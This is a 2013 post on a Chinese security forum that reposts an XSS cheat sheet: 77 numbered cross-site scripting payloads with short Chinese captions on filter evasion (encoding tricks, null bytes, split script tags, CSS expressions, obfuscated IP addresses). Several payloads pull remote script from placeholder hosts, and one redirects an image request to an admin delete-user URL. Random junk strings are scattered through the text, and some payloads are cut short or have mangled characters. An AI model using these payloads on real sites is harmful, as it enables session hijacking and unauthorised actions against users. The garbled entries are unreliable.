找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2730|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
7 q, j- J- M: \1 D  I# K(1)普通的XSS JavaScript注入4 j; M2 I- t# o" Z/ z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 O, Z6 v" X( J# F(2)IMG标签XSS使用JavaScript命令" p6 `) A. f; L% x4 v1 j- S
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 q% z% h# w# v5 }2 }  y* S
(3)IMG标签无分号无引号
9 N: a% U( u3 g! a! d; s- B<IMG SRC=javascript:alert(‘XSS’)>( h' P% }& r- x2 }% n
(4)IMG标签大小写不敏感! X. z. ^9 \: t
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>4 B- u) t$ V' e( O  m
(5)HTML编码(必须有分号)+ P, Q6 o+ X; P$ J
<IMG SRC=javascript:alert(“XSS”)>
: z) \) l, k" s" l5 `0 g0 s(6)修正缺陷IMG标签
! ~9 H  g1 W1 M) c+ P  q<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>& L$ ]6 |. G! ~* D6 P: A# K2 ?1 b; z
5 S0 I$ G# f& l7 p. @. C

9 Y, p( m" ^* l5 x* R(7)formCharCode标签(计算器)' P8 F7 H  M: W+ ?
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>8 H5 A+ X6 K9 A  Q
(8)UTF-8的Unicode编码(计算器)) s8 T, ~' {: {' T. M# |0 B$ o
<IMG SRC=jav..省略..S')>- Q* }, E1 S; \- l$ ~6 q. w! ^' d0 H
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)- J: s: @, s0 K2 A' \" {0 ]
<IMG SRC=jav..省略..S')>) j5 o( m6 i/ s- H% b- N# [
(10)十六进制编码也是没有分号(计算器)
- F8 X) ], p0 U1 P; K<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>: H$ W$ v7 L  j2 T1 F
(11)嵌入式标签,将Javascript分开+ r2 k' ^1 Z! Q+ t0 n/ c: K
<IMG SRC=”jav ascript:alert(‘XSS’);”>* {4 f) X( l) y1 L0 n; q/ ^* Q9 d& i4 u
(12)嵌入式编码标签,将Javascript分开( g9 [% ]. v; g# s; m+ [+ ~
<IMG SRC=”jav ascript:alert(‘XSS’);”># l- k( j, T$ t- y
(13)嵌入式换行符
$ i9 [5 g* I* y. N$ j<IMG SRC=”jav ascript:alert(‘XSS’);”>  |  I; b' U7 V% d
(14)嵌入式回车2 J) _% J/ |1 e
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 ]0 g  D& ~. O' p
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
+ D5 F# f' e2 N  z9 Z' p! X<IMG SRC=”javascript:alert(‘XSS‘)”>$ P7 |+ Y$ L9 m% K- _+ j, t
(16)解决限制字符(要求同页面)
  R) l* G0 ^4 G/ b- j2 Y% ]0 r0 {<script>z=’document.’</script>* N4 F" ]( q5 ]1 Z  L& j
<script>z=z+’write(“‘</script>8 b2 }5 A& A" A
<script>z=z+’<script’</script># t) P# ^. M3 N0 G0 l" z
<script>z=z+’ src=ht’</script>
( L6 B: ^- s. G<script>z=z+’tp://ww’</script>
( T5 A7 T5 Z1 @/ a* ?2 b<script>z=z+’w.shell’</script>! R8 K3 w+ N; e, e
<script>z=z+’.net/1.’</script>* P9 E  u; z$ A* L$ D  h$ a, O  v, P/ P
<script>z=z+’js></sc’</script>
. v' o$ s: M$ `' g; e6 l<script>z=z+’ript>”)’</script>" S' }2 ^( i: ?9 m' L% W5 Z9 X1 K9 E
<script>eval_r(z)</script>6 k! N. |4 x5 r' O+ |! s
(17)空字符12-7-1 T00LS - Powered by Discuz! Board8 `8 S0 P7 a6 L6 ?4 ~
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
& J) ^2 e4 u- ]9 jperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out1 l: m/ h! W5 u  q! Q8 }0 J  o6 S
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用1 q. ^  g7 }- r. c! |" H: C
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out+ B& j$ M2 N" _5 }5 _6 D6 w# V6 q
(19)Spaces和meta前的IMG标签- D9 N# g! I; |3 b! a
<IMG SRC=” javascript:alert(‘XSS’);”>
4 ^5 e+ ?0 @; @(20)Non-alpha-non-digit XSS% B1 D8 K( R3 ?3 ?2 r/ J) z+ C
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; U4 M. Q) D# d3 R/ H5 n(21)Non-alpha-non-digit XSS to 28 \9 K- I% s/ R8 @# X
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>5 p: m. X* u7 N
(22)Non-alpha-non-digit XSS to 3+ D' @" E+ f; x' l) C
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* p0 g/ |- ^8 I(23)双开括号& B$ `# L" S( h8 F4 A1 j+ X6 M* I1 c$ y
<<SCRIPT>alert(“XSS”);//<</SCRIPT>1 r. M# W$ i" ^
(24)无结束脚本标记(仅火狐等浏览器)
! d7 m  M  F, A<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>. K! \# Q  ^1 }. b4 J$ K
(25)无结束脚本标记2: I1 q# Q3 U2 w' u: Y5 A
<SCRIPT SRC=//3w.org/XSS/xss.js>
  M& t$ q. [2 S- }% ?" A(26)半开的HTML/JavaScript XSS- m0 k6 s' |. W5 F: h, {
<IMG SRC=”javascript:alert(‘XSS’)”
- i3 X' u* F! c' B2 x* u0 m(27)双开角括号
8 ~  m3 B6 }4 p- H' A! _<iframe src=http://3w.org/XSS.html <& _: v7 Q- |! O. u% |# u, h! a8 s
(28)无单引号 双引号 分号
; {1 Z/ x8 R; r9 I3 E3 b<SCRIPT>a=/XSS/$ @0 y% `) m6 L& j$ b
alert(a.source)</SCRIPT>- J$ \9 d+ a  C4 i5 d
(29)换码过滤的JavaScript
  h3 M* x# A6 o8 s\”;alert(‘XSS’);//3 a0 W7 ?4 ~; w% q+ W
(30)结束Title标签
( X) \/ R3 i+ V6 `  b- R</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
6 V" a6 k4 ?" C+ @5 ](31)Input Image) _8 x0 Q& Q) u
<INPUT SRC=”javascript:alert(‘XSS’);”>7 h& k9 J6 j  G/ b3 u! {, n7 X
(32)BODY Image9 p: Z# F5 g1 ~
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>5 L1 `1 O+ |) h/ K* w
(33)BODY标签, i0 M( H, S3 J1 p. f) o' h* M
<BODY(‘XSS’)>0 l. {3 L: G7 |' O7 L( e; h
(34)IMG Dynsrc- \. x! `; P* k3 I. Q5 c
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
$ q  T# q  h8 Q/ ~* a(35)IMG Lowsrc1 a/ s; I, u( Z; ?' B
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
. n& `9 n8 P; l+ ], M/ p; l* G(36)BGSOUND1 F* j2 @% v; z1 m: V' O
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
1 g, f$ q0 F0 {8 X+ w(37)STYLE sheet
3 ~: ~1 y6 n1 \5 O; V<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 Z# g, k: j4 ~- X' S# Q(38)远程样式表
# _; F! o4 ~+ a4 t: Y<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>6 M- z  [9 u; {
(39)List-style-image(列表式)
/ L& I" y& m: d8 x+ J5 R* |<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS3 ]2 f8 }1 B/ z
(40)IMG VBscript9 h  t. [: b% a
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
5 ^- K0 g5 O* `$ m: a/ I5 P(41)META链接url
0 ]/ I  g5 P! @! U! d, B) D0 p' r' |1 s; x' x% h. B2 F
2 j& T& M" r% s5 L# i
<META HTTP-EQUIV=”refresh” CONTENT=”0;
: w2 O/ g2 X: i) SURL=http://;URL=javascript:alert(‘XSS’);”>
* q9 d3 T- {3 z1 s. m(42)Iframe
0 ^* B9 i  Z7 v9 G- }9 V+ |<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>- l+ n! s( V1 F4 Y2 I! S
(43)Frame! Z3 T& q0 I2 J$ ~
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
% p* m2 O% }' V$ p1 ahttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
9 `2 s6 Y( A1 _. A% K: ]2 W" V(44)Table, h$ @" W1 M- Y
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
+ U( z- m. J+ |8 ?, R1 F5 v(45)TD/ f" r8 `" b. Y
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>, h3 L4 E& S7 H! T! b% ?( X9 _+ x
(46)DIV background-image
: l; J4 t3 V9 o2 A8 h<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; a4 Q# |4 }3 h$ F( O) `(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
; {. k* w9 f5 p  L8&13&12288&65279); U# O- n- S: G# s3 P5 a
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; p3 K" \: N4 S2 ?(48)DIV expression
; V6 Y. @5 E- }* m# n* G<DIV STYLE=”width: expression_r(alert(‘XSS’));”>1 ?" N" V% U  Q! p' e' ^* E0 `
(49)STYLE属性分拆表达
6 Q6 N  F5 V+ W<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
8 k2 J. y& }& {: L8 n7 a) W, b(50)匿名STYLE(组成:开角号和一个字母开头)
! l- T/ d' C1 r9 c8 V4 P( U<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>* r0 U9 l& `  Q- v
(51)STYLE background-image  e4 t: M9 J0 k4 R; Y" K
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A6 Y2 w" L' `0 A: |3 [$ I) x
CLASS=XSS></A>
6 b- |7 s2 O3 Z  x(52)IMG STYLE方式, z1 D9 E0 w- {' K$ r
exppression(alert(“XSS”))’>% ?' B; m( V# a0 ~' ?1 S" z
(53)STYLE background
+ c6 k7 X# |5 P0 n9 C7 w$ k<STYLE><STYLE
' Z4 E( X3 M2 q( G. jtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>+ Q7 m( ~- q, Z; n
(54)BASE, f3 J' e, j/ z
<BASE HREF=”javascript:alert(‘XSS’);//”>" h0 \  x# J; i$ _
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- H/ g) D2 u+ V5 \, O$ v
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
) z2 |' w( N, c- s7 E(56)在flash中使用ActionScrpt可以混进你XSS的代码: @4 g% E7 b+ n3 w' ~
a=”get”;
2 E! @% \( N! _b=”URL(\”";3 T- N) }4 R+ }) j
c=”javascript:”;
/ B1 G+ e9 I" E9 a" md=”alert(‘XSS’);\”)”;2 _5 o: ?* `! h; x; m6 R; F
eval_r(a+b+c+d);# Q; D0 f* y( ^. {5 _% D1 h
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上7 _  D1 a+ y/ n# u( O! `1 @2 J
<HTML xmlns:xss>
0 {/ C8 w4 J( l3 v4 m: [<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>7 C1 u, ^7 d1 o
<xss:xss>XSS</xss:xss>
- u# y( e9 j# c: X9 g) o( b' E% x" c</HTML>4 n, \. b9 H! @: z5 \: B. w
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用6 N" j& a  R' B$ y) e  g" H6 d4 y
<SCRIPT SRC=””></SCRIPT>
4 y, ~9 k& y8 E6 @* T# D% j(59)IMG嵌入式命令,可执行任意命令
+ i" G, B2 U, H  `( r2 b% H7 U<IMG SRC=”http://www.XXX.com/a.php?a=b”>+ v$ y) H7 R1 b2 G, ~
(60)IMG嵌入式命令(a.jpg在同服务器)
8 @8 Q5 R8 t7 ?" W: A0 E  \Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
. Y, N% v2 v9 ~( {. ^9 B(61)绕符号过滤
) c/ c1 ?6 B4 d" S<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>$ V, [8 p  b7 t9 |0 N- F( z7 K& a
(62)
+ `" \; j$ b0 Z* k<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 h7 ^& I/ R* x) Q2 }
(63)6 w' ]# P0 K! s( ?- Q& A  r" ^5 B" ?
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>- N9 g% Z0 a3 o' L  {" }* g2 \
(64)- ?$ O# |+ K5 G! \( G* A
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>) h- O! U, p& {& P4 G
(65)
; |( y, c8 f! k. [7 k& n<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
/ f1 o5 s4 `& w* [( T  m" T* K) ^(66)12-7-1 T00LS - Powered by Discuz! Board6 J& _1 _3 s# p
https://www.t00ls.net/viewthread ... table&tid=15267 4/62 @! j7 y  \1 T1 O7 B" W# k
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 r+ q+ u7 y# z/ i% L(67)
3 H2 @2 L; ^5 f+ e! s<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>- ^0 H2 w; t! ^4 c
</SCRIPT>5 ~( [) S+ v; F' e' ^! e, d) W
(68)URL绕行
5 a/ k- `! T  H: m, J<A HREF=”http://127.0.0.1/”>XSS</A>
0 H  S2 j$ K  a(69)URL编码0 |0 `7 m, Z# c
<A HREF=”http://3w.org”>XSS</A>, }' p! \% u% a, N: S
(70)IP十进制4 M  j# E6 P! V+ x8 c5 k6 F5 i4 w
<A HREF=”http://3232235521″>XSS</A>
/ \" h. q2 c6 T9 X. ^(71)IP十六进制
  g/ e+ M' p& l; D8 J<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
1 W7 ]- g& X! C6 d  ?$ I* k4 A(72)IP八进制  `. G6 V$ r$ _$ k. a$ B. n
<A HREF=”http://0300.0250.0000.0001″>XSS</A>$ d9 X0 n& l  u* G# t" L7 }6 m
(73)混合编码# j% ~7 E! S* ^3 e) D/ w
<A HREF=”h
0 c: o2 {! k% W) `& \tt p://6 6.000146.0×7.147/”">XSS</A>
4 w# i$ [6 o1 v. j$ w(74)节省[http:]' l# _) O& R& w8 T
<A HREF=”//www.google.com/”>XSS</A>
9 s( @2 l) L- L0 z. z8 G(75)节省[www]
7 A8 g1 g* [, g/ @6 m6 E<A HREF=”http://google.com/”>XSS</A>
! J* k$ P6 q, F(76)绝对点绝对DNS
: B8 c" ^. b* ]: j$ l8 Y4 T<A HREF=”http://www.google.com./”>XSS</A>  u% Q: I+ Y! \# g: I2 F
(77)javascript链接9 r9 W" z- d0 h# ]* i
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>, Y) h2 F; \  u9 n. }
& w% L0 n2 H& X5 V, |* L/ m/ V3 [$ d+ l
原文地址:http://fuzzexp.org/u/0day/?p=14( [/ ?4 O, X. R7 K/ \: i! H, Y

% y: r% G9 W- F% U* I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表